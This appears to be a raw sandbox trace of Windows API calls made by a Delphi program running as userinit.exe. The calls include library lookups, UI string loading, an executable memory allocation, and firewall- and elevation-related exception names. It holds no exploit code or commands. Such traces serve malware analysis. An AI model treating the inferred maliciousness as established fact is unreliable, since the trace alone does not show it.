[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0130.551] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0130.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0130.552] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0130.552] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0130.552] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0130.553] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0130.553] GetDC (hWnd=0x0) returned 0x2301087a
[0130.553] GetDeviceCaps (hdc=0x2301087a, index=90) returned 96
[0130.553] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.553] GetDC (hWnd=0x0) returned 0x2301087a
[0130.553] GetDeviceCaps (hdc=0x2301087a, index=104) returned 0
[0130.553] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.553] CreatePalette (plpal=0x8f454) returned 0x5c080864
[0130.553] GetStockObject (i=7) returned 0x1b00017
[0130.553] GetStockObject (i=5) returned 0x1900015
[0130.553] GetStockObject (i=13) returned 0x18a002e
[0130.553] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0130.553] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0130.553] LoadStringA (in: hInstance=0x28a0000, uID=0xff3d, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0130.553] LoadStringA (in: hInstance=0x28a0000, uID=0xff3c, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0130.553] LoadStringA (in: hInstance=0x28a0000, uID=0xff3b, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0130.553] LoadStringA (in: hInstance=0x28a0000, uID=0xff3a, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0130.553] LoadStringA (in: hInstance=0x28a0000, uID=0xff39, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0130.553] LoadStringA (in: hInstance=0x28a0000, uID=0xff38, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0130.553] LoadStringA (in: hInstance=0x28a0000, uID=0xff37, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff36, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff35, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff34, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff33, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff32, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff31, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff30, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff4f, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff4e, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff4d, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xff4c, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0130.554] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0130.554] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0130.554] GetCurrentThreadId () returned 0x764
[0130.554] GlobalAddAtomA (lpString="WndProcPtr028A000000000764") returned 0xc12a
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfefc, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfefb, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfefa, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfef9, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfef8, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfef7, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfef6, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfef5, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0130.554] LoadStringA (in: hInstance=0x28a0000, uID=0xfef4, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xfef3, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xfef2, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xfef1, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xfef0, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff0f, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff0e, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff0d, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff0c, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff0b, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff0a, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff09, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff08, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff07, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff06, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff05, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff04, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff03, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff02, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff01, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff00, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff1f, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff1e, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff1d, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff1c, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff1b, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff1a, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff19, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff18, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff17, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff16, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff15, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff14, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff13, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff12, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff11, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff10, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff2f, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0130.555] LoadStringA (in: hInstance=0x28a0000, uID=0xff2e, lpBuffer=0x8f450, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0130.556] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0130.556] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0130.556] GetVersion () returned 0x1db10106
[0130.556] GetCurrentProcessId () returned 0x824
[0130.556] GlobalAddAtomA (lpString="Delphi00000824") returned 0xc12f
[0130.556] GetCurrentThreadId () returned 0x764
[0130.556] GlobalAddAtomA (lpString="ControlOfs028A000000000764") returned 0xc129
[0130.556] RegisterClipboardFormatA (lpszFormat="ControlOfs028A000000000764") returned 0xc172
[0130.556] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0130.556] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0130.556] GetSystemMetrics (nIndex=19) returned 1
[0130.556] GetSystemMetrics (nIndex=75) returned 1
[0130.556] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x29c1320, fWinIni=0x0 | out: pvParam=0x29c1320) returned 1
[0130.556] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0130.556] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0130.556] LoadCursorA (hInstance=0x28a0000, lpCursorName=0x7ff9) returned 0x601b3
[0130.556] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0130.556] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0130.556] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0130.556] LoadCursorA (hInstance=0x28a0000, lpCursorName=0x7ffa) returned 0x8022d
[0130.557] LoadCursorA (hInstance=0x28a0000, lpCursorName=0x7ffb) returned 0x60221
[0130.557] LoadCursorA (hInstance=0x28a0000, lpCursorName=0x7ffc) returned 0x6021d
[0130.557] LoadCursorA (hInstance=0x28a0000, lpCursorName=0x7ffd) returned 0x70217
[0130.557] LoadCursorA (hInstance=0x28a0000, lpCursorName=0x7fff) returned 0x70215
[0130.557] LoadCursorA (hInstance=0x28a0000, lpCursorName=0x7ffe) returned 0x70203
[0130.557] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0130.557] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0130.557] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0130.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0130.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0130.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0130.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0130.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0130.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0130.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0130.558] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0130.558] GetDC (hWnd=0x0) returned 0x2301087a
[0130.558] GetDeviceCaps (hdc=0x2301087a, index=90) returned 96
[0130.558] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.558] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0130.558] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x28f9a60, dwData=0x29c156c) returned 1
[0130.558] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x8f7bb, fWinIni=0x0 | out: pvParam=0x8f7bb) returned 1
[0130.558] CreateFontIndirectA (lplf=0x8f7bb) returned 0x6d0a0862
[0130.558] GetObjectA (in: h=0x6d0a0862, c=60, pv=0x8f5ac | out: pv=0x8f5ac) returned 60
[0130.558] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x8f667, fWinIni=0x0 | out: pvParam=0x8f667) returned 1
[0130.558] CreateFontIndirectA (lplf=0x8f743) returned 0x380a0840
[0130.558] GetObjectA (in: h=0x380a0840, c=60, pv=0x8f5ac | out: pv=0x8f5ac) returned 60
[0130.558] CreateFontIndirectA (lplf=0x8f707) returned 0x1d0a0879
[0130.559] GetObjectA (in: h=0x1d0a0879, c=60, pv=0x8f5ac | out: pv=0x8f5ac) returned 60
[0130.559] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0130.559] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8f71b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.559] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x8f71b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0130.559] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x360000
[0130.559] GetKeyboardLayoutList (in: nBuff=64, lpList=0x8f69c | out: lpList=0x8f69c) returned 1
[0130.560] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0130.560] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0130.561] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6cc60000
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="InitializeFlatSB") returned 0x6cc9266f
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="UninitializeFlatSB") returned 0x6cc92542
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollProp") returned 0x6cc91d29
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollProp") returned 0x6cc9238d
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cc920c9
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cc91fdb
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollRange") returned 0x6cc91e8d
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cc91f0f
[0130.561] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollPos") returned 0x6cc91ccd
[0130.562] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollPos") returned 0x6cc9216d
[0130.562] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cc922be
[0130.562] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollRange") returned 0x6cc921e2
[0130.562] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0130.562] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0130.562] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0130.562] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0130.562] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0130.562] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0130.562] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0130.562] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0130.562] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0130.562] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0130.562] LoadStringA (in: hInstance=0x28a0000, uID=0xff59, lpBuffer=0x8f3fc, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0130.562] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0130.563] LoadStringA (in: hInstance=0x28a0000, uID=0xff5a, lpBuffer=0x8f3fc, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0130.563] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0130.563] LoadStringA (in: hInstance=0x28a0000, uID=0xff5b, lpBuffer=0x8f3fc, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0130.563] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0130.563] LoadStringA (in: hInstance=0x28a0000, uID=0xff5c, lpBuffer=0x8f3fc, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0130.563] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0130.563] SetErrorMode (uMode=0x8000) returned 0x1
[0130.563] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ce80000
[0130.565] SetErrorMode (uMode=0x1) returned 0x8000
[0130.565] GetProcAddress (hModule=0x6ce80000, lpProcName="OleCreatePropertyFrame") returned 0x6ce820ea
[0130.565] GetProcAddress (hModule=0x6ce80000, lpProcName="OleCreateFontIndirect") returned 0x6ce820b7
[0130.565] GetProcAddress (hModule=0x6ce80000, lpProcName="OleCreatePictureIndirect") returned 0x6ce820c8
[0130.565] GetProcAddress (hModule=0x6ce80000, lpProcName="OleLoadPicture") returned 0x6ce820d9
[0130.566] SysReAllocStringLen (in: pbstr=0x298fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x298fa98*="EJwsclUnsupportedException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x298fa80*="EJwsclPIDException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x298fa68*="EJwsclJwShellExecuteException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x298fa50*="EJwsclShellExecuteException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x298fa38*="EJwsclElevationException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x298fa20*="EJwsclAbortException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x298fa08*="EJwsclSuRunErrorException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x298f9f0*="EJwsclElevateProcessException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x298f9d8*="EJwsclCertApiException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x298f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x298f9a8*="EJwsclInvalidStartupInfo") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x298f990*="EJwsclFirewallNoExceptionsException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x298f978*="EJwsclFirewallInactiveException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x298f960*="EJwsclFirewallDelRuleException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x298f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x298f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x298f918*="EJwsclFirewallAddRuleException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x298f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x298f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x298f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x298f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x298f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x298f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x298f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x298f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x298f840*="EJwsclGetFWStateException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x298f828*="EJwsclSetFWStateException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x298f810*="EJwsclFirewallProfileInitException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x298f7f8*="EJwsclFirewallInitException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x298f7e0*="EJwsclGenericFirewallException") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x298f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0130.566] SysReAllocStringLen (in: pbstr=0x298f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x298f7b0*="EJwsclInvalidRegistryPath") returned 1
